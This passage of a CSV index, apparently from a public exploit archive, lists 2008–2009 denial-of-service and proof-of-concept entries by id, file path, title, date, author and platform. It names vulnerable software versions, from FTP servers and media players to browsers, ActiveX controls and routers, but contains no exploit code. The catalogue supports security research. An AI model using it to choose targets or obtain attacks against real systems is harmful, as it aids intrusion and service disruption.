Landi",dos,windows, +6101,exploits/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Unauthenticated Remote Denial of Service",2008-07-19,"Joxean Koret",dos,multiple, +6103,exploits/windows/dos/6103.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",dos,windows, +6120,exploits/minix/dos/6120.txt,"Minix 3.1.2a - Local TTY Panic (Denial of Service)",2008-07-23,kokanin,dos,minix, +6129,exploits/minix/dos/6129.txt,"Minix 3.1.2a - Remote TTY Panic (Denial of Service)",2008-07-25,kokanin,dos,minix, +6174,exploits/multiple/dos/6174.txt,"F-PROT AntiVirus 6.2.1.4252 - Malformed Archive Infinite Loop Denial of Service",2008-07-31,kokanin,dos,multiple, +6181,exploits/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote Denial of Service Crash (PoC)",2008-08-01,beford,dos,windows, +6196,exploits/hardware/dos/6196.pl,"Xerox Phaser 8400 - Remote Reboot (Denial of Service)",2008-08-03,crit3rion,dos,hardware, +6201,exploits/windows/dos/6201.html,"HydraIrc 0.3.164 - Remote Denial of Service",2008-08-04,securfrog,dos,windows, +6216,exploits/windows/dos/6216.html,"Download Accelerator Plus DAP 8.6 - 'AniGIF.ocx' Buffer Overflow (PoC)",2008-08-10,"Guido Landi",dos,windows, +6218,exploits/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 - Privilege Escalation (PoC)",2008-08-10,"Core Security",dos,multiple, +6237,exploits/multiple/dos/6237.txt,"Ventrilo 3.0.2 - Null Pointer Remote Denial of Service",2008-08-13,"Luigi Auriemma",dos,multiple, +6239,exploits/multiple/dos/6239.txt,"Ruby 1.9 - regex engine Remote Socket Memory Leak",2008-08-13,"laurent gaffié",dos,multiple, +6240,exploits/windows/dos/6240.py,"FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)",2008-08-13,h07,dos,windows, +6244,exploits/windows/dos/6244.js,"Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow (PoC)",2008-08-14,Symantec,dos,windows, +6251,exploits/windows/dos/6251.txt,"ESET Smart Security 3.0.667.0 - Privilege Escalation (PoC)",2008-08-16,g_,dos,windows, +6252,exploits/multiple/dos/6252.txt,"VideoLAN VLC Media Player 0.8.6i - '.tta' File Parsing Heap Overflow (PoC)",2008-08-16,g_,dos,multiple, +6253,exploits/windows/dos/6253.txt,"EO Video 1.36 - Local Heap Overflow Denial of Service / (PoC)",2008-08-16,j0rgan,dos,windows, +6257,exploits/windows/dos/6257.pl,"Ipswitch WS_FTP Home/Professional FTP Client - Remote Format String (PoC)",2008-08-17,securfrog,dos,windows, +6262,exploits/windows/dos/6262.txt,"VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service",2008-08-18,g_,dos,windows, +6293,exploits/multiple/dos/6293.txt,"VideoLAN VLC Media Player 0.8.6i - Mms Protocol Handling Heap Overflow (PoC)",2008-08-23,g_,dos,multiple, +6319,exploits/windows/dos/6319.html,"Ultra Office - ActiveX Control Arbitrary File Corruption",2008-08-27,shinnai,dos,windows, +6326,exploits/windows/dos/6326.html,"LogMeIn Remote Access Utility - ActiveX Memory Corruption (Denial of Service)",2008-08-29,"YAG KOHHA",dos,windows, +6327,exploits/windows/dos/6327.html,"Najdi.si Toolbar - ActiveX Remote Buffer Overflow (PoC)",2008-08-29,shinnai,dos,windows, +6330,exploits/windows/dos/6330.txt,"Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC)",2008-08-29,Ac!dDrop,dos,windows, +6345,exploits/windows/dos/6345.html,"VMware - COM API ActiveX Remote Buffer Overflow (PoC)",2008-09-01,shinnai,dos,windows, +6353,exploits/windows/dos/6353.txt,"Google Chrome 0.2.149.27 - Denial of Service",2008-09-03,"Rishi Narang",dos,windows, +6365,exploits/windows/dos/6365.php,"Google Chrome 0.2.149.27 - '1583' Remote Silent Crash (PoC)",2008-09-04,WHK,dos,windows, +6372,exploits/windows/dos/6372.html,"Google Chrome 0.2.149.27 - A HREF Denial of Service",2008-09-05,Shinnok,dos,windows, +6386,exploits/windows/dos/6386.html,"Google Chrome 0.2.149.27 - Inspect Element Denial of Service",2008-09-05,Metacortex,dos,windows, +6391,exploits/windows/dos/6391.html,"Flock Social Web Browser 1.2.5 - 'loop' Remote Denial of Service",2008-09-06,LiquidWorm,dos,windows, +6394,exploits/hardware/dos/6394.pl,"Samsung DVR SHR2040 - HTTPD Remote Denial of Service Denial of Service (PoC)",2008-09-07,"Alex Hernandez",dos,hardware, +6424,exploits/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service",2008-09-11,"Jeremy Brown",dos,windows, +6434,exploits/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 - Unicode Remote Denial of Service (PoC)",2008-09-11,LiquidWorm,dos,windows, +6458,exploits/windows/dos/6458.c,"The Personal FTP Server 6.0f - RETR Denial of Service",2008-09-14,Shinnok,dos,windows, +6459,exploits/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) - Remote Denial of Service",2008-09-14,wins.mallow,dos,hardware, +6463,exploits/windows/dos/6463.rb,"Microsoft Windows - WRITE_ANDX SMB command handling Kernel Denial of Service (Metasploit)",2008-09-15,"Javier Vicente Vallejo",dos,windows, +6471,exploits/multiple/dos/6471.pl,"Apple QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash",2008-09-16,securfrog,dos,multiple, +6472,exploits/multiple/dos/6472.c,"Postfix < 2.4.9/2.5.5/2.6-20080902 - '.forward' Local Denial of Service",2008-09-16,"Albert Sellares",dos,multiple, +6474,exploits/windows/dos/6474.rb,"WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit)",2008-09-17,"belay tows",dos,windows, +6481,exploits/php/dos/6481.c,"Femitter FTP Server 1.03 - 'RETR' Remote Denial of Service (PoC)",2008-09-17,LiquidWorm,dos,php, +6493,exploits/linux/dos/6493.pl,"fhttpd 0.4.2 - 'un64()' Remote Denial of Service",2008-09-19,"Jeremy Brown",dos,linux, +6496,exploits/windows/dos/6496.c,"DESlock+ < 3.2.7 - Local Kernel Overflow (PoC)",2008-09-20,mu-b,dos,windows, +6497,exploits/windows/dos/6497.c,"DESlock+ < 3.2.7 - Local Kernel Race Condition Denial of Service (PoC)",2008-09-20,mu-b,dos,windows, +6498,exploits/windows/dos/6498.c,"DESlock+ < 3.2.7 - 'probe read' Local Kernel Denial of Service (PoC)",2008-09-20,mu-b,dos,windows, +6515,exploits/windows/dos/6515.c,"DESlock+ 3.2.7 - 'vdlptokn.sys' Local Denial of Service",2008-09-21,"NT Internals",dos,windows, +6554,exploits/windows/dos/6554.html,"Google Chrome - Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",dos,windows, +6560,exploits/windows/dos/6560.txt,"Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)",2008-09-25,securfrog,dos,windows, +6565,exploits/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer Denial of Service (PoC)",2008-09-25,Aodrulez,dos,windows, +6581,exploits/windows/dos/6581.pl,"WinFTP Server 2.3.0 - 'NLST' Denial of Service",2008-09-26,"Julien Bedard",dos,windows, +6582,exploits/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device Long Name Remote Reboot (Denial of Service)",2008-09-26,"Julien Bedard",dos,hardware, +6588,exploits/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ICO' Remote Division By Zero",2008-09-26,"laurent gaffié",dos,windows, +6609,exploits/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",dos,windows, +6614,exploits/windows/dos/6614.html,"Mozilla Firefox 3.0.3 - User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",dos,windows, +6615,exploits/windows/dos/6615.html,"Opera 9.52 - Window Object Suppressing Remote Denial of Service",2008-09-28,"Aditya K Sood",dos,windows, +6616,exploits/windows/dos/6616.txt,"Microsoft Windows Explorer - '.zip' Denial of Service",2008-09-28,"fl0 fl0w",dos,windows, +6619,exploits/windows/dos/6619.html,"Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)",2008-09-28,"John Smith",dos,windows, +6622,exploits/multiple/dos/6622.txt,"Wireshark 1.0.x - '.ncf' Packet Capture Local Denial of Service",2008-09-29,Shinnok,dos,multiple, +6647,exploits/windows/dos/6647.c,"ESET SysInspector 1.1.1.0 - 'esiadrv.sys' (PoC)",2008-10-01,"NT Internals",dos,windows, +6651,exploits/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",dos,windows, +6654,exploits/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,dos,windows, +6658,exploits/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - Malformed Archive Denial of Service",2008-10-03,LiquidWorm,dos,windows, +6660,exploits/windows/dos/6660.txt,"RhinoSoft Serv-U FTP Server 7.3 - Authenticated 'stou con:1' Denial of Service",2008-10-03,dmnt,dos,windows, +6668,exploits/windows/dos/6668.txt,"AyeView 2.20 - '.GIF' Image Local Crash",2008-10-04,suN8Hclf,dos,windows, +6671,exploits/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account (Blue Screen of Death)",2008-10-04,Defsanguje,dos,windows, +6672,exploits/windows/dos/6672.txt,"AyeView 2.20 - Invalid Bitmap Header Parsing Crash",2008-10-05,suN8Hclf,dos,windows, +6673,exploits/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - '.BMP' Image Crash",2008-10-05,suN8Hclf,dos,windows, +6689,exploits/linux/dos/6689.txt,"Konqueror 3.5.9 - 'font color' Remote Crash",2008-10-06,"Jeremy Brown",dos,linux, +6704,exploits/linux/dos/6704.txt,"Konqueror 3.5.9 - 'color'/'bgcolor' Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",dos,linux, +6716,exploits/windows/dos/6716.pl,"Microsoft Windows - GDI+ (PoC) (MS08-052) (2)",2008-10-09,"John Smith",dos,windows, +6717,exploits/windows/dos/6717.py,"WinFTP Server 2.3.0 - 'PASV Mode' Remote Denial of Service",2008-10-09,dmnt,dos,windows, +6718,exploits/linux/dos/6718.html,"Konqueror 3.5.9 - 'load' Remote Crash",2008-10-10,"Jeremy Brown",dos,linux, +6719,exploits/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - 'POP3' Unauthenticated Denial of Service",2008-10-10,rAWjAW,dos,windows, +6726,exploits/hardware/dos/6726.txt,"Nokia Mini Map Browser - 'Array Sort' Silent Crash",2008-10-10,ikki,dos,hardware, +6732,exploits/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow (PoC) (MS08-046)",2008-10-12,Ac!dDrop,dos,windows, +6738,exploits/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service",2008-10-12,dmnt,dos,windows, +6741,exploits/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service",2008-10-13,shinnai,dos,windows, +6742,exploits/windows/dos/6742.py,"RaidenFTPd 2.4 build 3620 - Remote Denial of Service",2008-10-13,dmnt,dos,windows, +6752,exploits/windows/dos/6752.pl,"Eserv 3.x - FTP Server (ABOR) Remote Stack Overflow (PoC)",2008-10-14,LiquidWorm,dos,windows, +6753,exploits/windows/dos/6753.py,"Titan FTP Server 6.26 build 630 - Remote Denial of Service",2008-10-14,dmnt,dos,windows, +6756,exploits/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",dos,windows, +6761,exploits/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)",2008-10-16,"Thomas Pollet",dos,windows, +6775,exploits/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE 'taddr2uaddr()' Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",dos,solaris, +6800,exploits/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows, +6805,exploits/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",dos,multiple, +6812,exploits/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows, +6815,exploits/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - Denial of Service",2008-10-23,"Jeremy Brown",dos,windows, +6824,exploits/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",dos,windows, +6832,exploits/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,dos,windows, +6834,exploits/windows/dos/6834.c,"vicFTP 5.0 - 'LIST' Remote Denial of Service",2008-10-24,"Alfons Luja",dos,windows, +6838,exploits/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service (Metasploit)",2008-10-25,"Saint Patrick",dos,windows, +6863,exploits/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service",2008-10-29,"Jeremy Brown",dos,windows, +6926,exploits/windows/dos/6926.pl,"FTP Now 2.6 Server - Response Remote Crash (PoC)",2008-11-01,DeltahackingTEAM,dos,windows, +7060,exploits/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,dos,hardware, +7088,exploits/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,dos,osx, +7090,exploits/windows/dos/7090.txt,"ooVoo 1.7.1.35 - 'URL Protocol' Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,dos,windows, +7091,exploits/linux/dos/7091.c,"Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic (Denial of Service)",2008-11-11,"Andrea Bittau",dos,linux, +7099,exploits/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - 'Community' Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",dos,windows, +7100,exploits/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",dos,linux, +7109,exploits/windows/dos/7109.txt,"Pi3Web 2.0.3 - 'ISAPI' Remote Denial of Service",2008-11-13,"Hamid Ebadi",dos,windows, +7126,exploits/windows/dos/7126.html,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (PoC)",2008-11-15,r0ut3r,dos,windows, +7150,exploits/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (Add RSS Subscription) Remote Crash",2008-11-18,"Adrian _pagvac_ Pastor",dos,linux, +7178,exploits/windows/dos/7178.txt,"BitDefender - Module pdf.xmd Infinite Loop Denial of Service (PoC)",2008-11-20,ProTeuS,dos,windows, +7207,exploits/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 - '.m3u' Playlist File Remote Buffer Overflow (PoC)",2008-11-24,LiquidWorm,dos,windows, +7209,exploits/windows/dos/7209.pl,"W3C Amaya 10.1 Web Browser - URL Bar Remote Stack Overflow (PoC)",2008-11-24,r0ut3r,dos,windows, +7213,exploits/windows/dos/7213.pl,"W3C Amaya 10.1 Web Browser - 'id' Remote Stack Overflow (PoC)",2008-11-24,r0ut3r,dos,windows, +7219,exploits/windows/dos/7219.pl,"Total Video Player - 'vcen.dll' Remote Off-by-One Crash",2008-11-24,Cnaph,dos,windows, +7220,exploits/hardware/dos/7220.txt,"Siemens C450IP/C475IP - Remote Denial of Service",2008-11-24,"sky & Any",dos,hardware, +7226,exploits/windows/dos/7226.html,"Google Chrome - MetaCharacter URI Obfuscation",2008-11-25,"Aditya K Sood",dos,windows, +7249,exploits/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b - 'wscanf' Remote Format String (PoC)",2008-11-27,"Alfons Luja",dos,windows, +7262,exploits/windows/dos/7262.pl,"Microsoft Office - Communicator 'SIP' Remote Denial of Service",2008-11-28,"Praveen Darshanam",dos,windows, +7296,exploits/windows/dos/7296.txt,"Apple iTunes 8.0.2.20/QuickTime 7.5.5 - '.mov' Multiple Off By Overflows (PoC)",2008-11-30,"laurent gaffié",dos,windows, +7297,exploits/windows/dos/7297.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)",2008-11-30,Encrypt3d.M!nd,dos,windows, +7307,exploits/windows/dos/7307.txt,"Electronics Workbench - '.ewb' Local Stack Overflow (PoC)",2008-11-30,Zigma,dos,windows, +7314,exploits/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",dos,windows, +7330,exploits/multiple/dos/7330.c,"ClamAV < 0.94.2 - JPEG Parsing Recursive Stack Overflow (PoC)",2008-12-03,"ilja van sprundel",dos,multiple, +7358,exploits/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX - 'VSPDFEditorX.ocx' Insecure Method",2008-12-05,"Marco Torti",dos,windows, +7362,exploits/windows/dos/7362.py,"DesignWorks Professional 4.3.1 - '.CCT' File Local Stack Buffer Overflow (PoC)",2008-12-06,Cnaph,dos,windows, +7387,exploits/windows/dos/7387.py,"Neostrada Livebox Router - Remote Network Down (PoC)",2008-12-08,0in,dos,windows, +7401,exploits/windows/dos/7401.txt,"Vinagre < 2.24.2 - 'show_error()' Remote Format String (PoC)",2008-12-09,"Core Security",dos,windows, +7405,exploits/linux/dos/7405.c,"Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service",2008-12-10,"Jon Oberheide",dos,linux, +7431,exploits/windows/dos/7431.pl,"Microsoft Visual Basic - ActiveX Controls mscomct2.ocx Buffer Overflow (PoC)",2008-12-12,"Jerome Athias",dos,windows, +7454,exploits/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic/2.6.18/2.6.24-1 - Local Denial of Service",2008-12-14,Adurit-T,dos,linux, +7460,exploits/windows/dos/7460.html,"EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,dos,windows, +7467,exploits/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - HTML Tag Buffer Overflow (PoC)",2008-12-15,webDEViL,dos,multiple, +7520,exploits/multiple/dos/7520.c,"Avahi < 0.6.24 - mDNS Daemon Remote Denial of Service",2008-12-19,"Jon Oberheide",dos,multiple, +7535,exploits/hardware/dos/7535.php,"Linksys WAG54G v2 Wireless ADSL Router - HTTPd Denial of Service",2008-12-21,r0ut3r,dos,hardware, +7554,exploits/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 - location.hash Remote Crash",2008-12-23,"Jeremy Brown",dos,windows, +7555,exploits/multiple/dos/7555.py,"Psi Jabber Client (Windows / Linux) - Remote Denial of Service",2008-12-23,Sha0,dos,multiple, +7556,exploits/windows/dos/7556.php,"PGP Desktop 9.0.6 - 'PGPwded.sys' Local Denial of Service",2008-12-23,Evilcry,dos,windows, +7564,exploits/multiple/dos/7564.pl,"Getleft 1.2 - Remote Buffer Overflow (PoC)",2008-12-23,Koshi,dos,multiple, +7571,exploits/windows/dos/7571.txt,"BulletProof FTP Client 2.63 - Local Heap Overflow (PoC)",2008-12-24,His0k4,dos,windows, +7578,exploits/windows/dos/7578.pl,"SAWStudio 3.9i - '.prf' Local Buffer Overflow (PoC)",2008-12-24,Encrypt3d.M!nd,dos,windows, +7585,exploits/windows/dos/7585.txt,"Microsoft Windows Media Player - '.wav' Remote Crash (PoC)",2008-12-28,"laurent gaffié",dos,windows, +7589,exploits/windows/dos/7589.pl,"BulletProof FTP Client - '.bps' Local Stack Overflow (PoC)",2008-12-28,Stack,dos,windows, +7592,exploits/windows/dos/7592.pl,"Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow (PoC)",2008-12-28,Encrypt3d.M!nd,dos,windows, +7632,exploits/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service",2009-01-01,"Tobias Engel",dos,hardware, +7634,exploits/windows/dos/7634.pl,"Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)",2009-01-01,Houssamix,dos,windows, +7637,exploits/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow (PoC)",2009-01-01,"aBo MoHaMeD",dos,windows, +7643,exploits/multiple/dos/7643.txt,"Konqueror 4.1 - Cross-Site Scripting / Remote Crash",2009-01-01,StAkeR,dos,multiple, +7647,exploits/multiple/dos/7647.txt,"VMware 2.5.1 - 'VMware-authd' Remote Denial of Service",2009-01-02,"laurent gaffié",dos,multiple, +7649,exploits/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",dos,windows, +7652,exploits/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,dos,windows, +7673,exploits/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow HeapSpray (PoC)",2009-01-05,Skylined,dos,multiple, +7685,exploits/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - Denial of Service",2009-01-06,StAkeR,dos,multiple, +7693,exploits/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - 'user' Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,dos,windows, +7694,exploits/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,dos,windows, +7696,exploits/windows/dos/7696.pl,"Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,dos,windows, +7708,exploits/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - '.mp3' Local Heap Overflow (PoC)",2009-01-09,Houssamix,dos,windows, +7709,exploits/windows/dos/7709.pl,"VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (PoC)",2009-01-09,"aBo MoHaMeD",dos,windows, +7710,exploits/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service",2009-01-09,Skylined,dos,windows, +7720,exploits/windows/dos/7720.pl,"Microsoft Windows - '.chm' Denial of Service (HTML Compiled)",2009-01-11,securfrog,dos,windows, +7721,exploits/windows/dos/7721.pl,"Browse3D 3.5 - '.sfs' Local Buffer Overflow (PoC)",2009-01-11,Houssamix,dos,windows, +7737,exploits/windows/dos/7737.py,"Triologic Media Player 7 - '.m3u' Local Heap Buffer Overflow (PoC)",2009-01-12,zAx,dos,windows, +7742,exploits/windows/dos/7742.txt,"Winamp 5.541 - '.mp3'/'.aiff' File Multiple Denial of Service Vulnerabilities",2009-01-12,securfrog,dos,windows, +7750,exploits/windows/dos/7750.html,"PowerPoint Viewer OCX 3.1 - Remote File Overwrite",2009-01-13,Stack,dos,windows, +7751,exploits/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow (PoC)",2009-01-13,Stack,dos,windows, +7756,exploits/windows/dos/7756.py,"Nofeel FTP Server 3.6 - 'CWD' Remote Memory Consumption",2009-01-13,His0k4,dos,windows, +7776,exploits/hardware/dos/7776.c,"Cisco - VLAN Trunking Protocol Denial of Service",2009-01-14,showrun,dos,hardware, +7785,exploits/multiple/dos/7785.py,"Oracle TimesTen - Remote Format String (PoC)",2009-01-14,"Joxean Koret",dos,multiple, +7790,exploits/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",dos,windows, +7799,exploits/windows/dos/7799.pl,"Novell Netware 6.5 - 'ICEbrowser' Remote System Denial of Service",2009-01-16,"Jeremy Brown",dos,windows, +7812,exploits/multiple/dos/7812.pl,"MPlayer 1.0rc2 - TwinVQ Stack Buffer Overflow (PoC)",2009-01-16,sCORPINo,dos,multiple, +7822,exploits/multiple/dos/7822.c,"D-Bus Daemon < 1.2.4 - 'libdbus' Denial of Service",2009-01-19,"Jon Oberheide",dos,multiple, +7823,exploits/qnx/dos/7823.txt,"QNX 6.4.0 - bitflipped ELF Binary 'id' Kernel Panic (Denial of Service)",2009-01-19,kokanin,dos,qnx, +7852,exploits/windows/dos/7852.pl,"FTPShell Server 4.3 - Licence Key Remote Buffer Overflow (PoC)",2009-01-22,LiquidWorm,dos,windows, +7854,exploits/windows/dos/7854.pl,"MediaMonkey 3.0.6 - '.m3u' Local Buffer Overflow (PoC)",2009-01-25,AlpHaNiX,dos,windows, +7857,exploits/windows/dos/7857.pl,"Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)",2009-01-25,Houssamix,dos,windows, +7865,exploits/solaris/dos/7865.c,"SunOS Release 5.11 snv_101b - Remote IPv6 Crash",2009-01-26,kingcope,dos,solaris, +7869,exploits/windows/dos/7869.html,"MW6 Barcode - ActiveX 'Barcode.dll' Remote Heap Overflow (PoC)",2009-01-26,Houssamix,dos,windows, +7882,exploits/windows/dos/7882.html,"NCTVideoStudio ActiveX DLLs 1.6 - Remote Heap Overflow (PoC)",2009-01-26,Stack,dos,windows, +7887,exploits/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)",2009-01-27,Hakxer,dos,windows, +7889,exploits/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - '.m3u' Local Heap Overflow (PoC)",2009-01-27,Hakxer,dos,windows, +7890,exploits/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - '.gqmpeg' Buffer Overflow (PoC)",2009-01-27,Hakxer,dos,windows, +7902,exploits/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML / HTML Parser",2009-01-28,"Core Security",dos,windows, +7904,exploits/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - '.m3u' Crash (PoC)",2009-01-29,Hakxer,dos,windows, +7906,exploits/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,dos,windows, +7934,exploits/windows/dos/7934.py,"Spider Player 2.3.9.5 - '.asx' Off-by-One Crash",2009-01-30,Houssamix,dos,windows, +7942,exploits/windows/dos/7942.pl,"Elecard AVC HD player - '.m3u' / '.xpl' Local Stack Overflow (PoC)",2009-02-02,AlpHaNiX,dos,windows, +7943,exploits/windows/dos/7943.py,"RealVNC 4.1.2 - 'vncviewer.exe' RFB Protocol Remote Code Execution (PoC)",2009-02-02,"Andres Luksenberg",dos,windows, +7962,exploits/windows/dos/7962.pl,"Hex Workshop 6.0 - '.cmap' Invalid Memory Reference (PoC)",2009-02-03,DATA_SNIPER,dos,windows, +7985,exploits/windows/dos/7985.pl,"Novell Groupwise 8.0 - Malformed RCPT Command Off-by-One",2009-02-04,"Praveen Darshanam",dos,windows, +7986,exploits/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",dos,windows, +7990,exploits/windows/dos/7990.py,"UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)",2009-02-04,"Andres Luksenberg",dos,windows, +7995,exploits/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",dos,windows, +8008,exploits/hardware/dos/8008.txt,"NETGEAR SSL312 Router - Denial of Service",2009-02-09,Rembrandt,dos,hardware, +8013,exploits/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",dos,hardware, +8021,exploits/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service",2009-02-09,"Praveen Darshanam",dos,multiple, +8024,exploits/windows/dos/8024.py,"TightVNC - Authentication Failure Integer Overflow (PoC)",2009-02-09,desi,dos,windows, +8051,exploits/hardware/dos/8051.html,"Nokia N95-8 browser - 'setAttributeNode' Method Crash",2009-02-13,"Juan Yacubian",dos,hardware, +8058,exploits/windows/dos/8058.pl,"TPTEST 3.1.7 - Stack Buffer Overflow (PoC)",2009-02-16,ffwd,dos,windows, +8077,exploits/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption (PoC) (MS09-002)",2009-02-18,anonymous,dos,windows, +8084,exploits/windows/dos/8084.pl,"Got All Media 7.0.0.3 - Remote Denial of Service",2009-02-20,LiquidWorm,dos,windows, +8090,exploits/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,dos,windows, +8091,exploits/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - BODY onload Remote Crash",2009-02-23,Skylined,dos,multiple, +8099,exploits/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)",2009-02-23,"Guido Landi",dos,windows, +8102,exploits/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,dos,windows, +8106,exploits/hardware/dos/8106.txt,"NETGEAR WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,dos,hardware, +8125,exploits/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",dos,hardware, 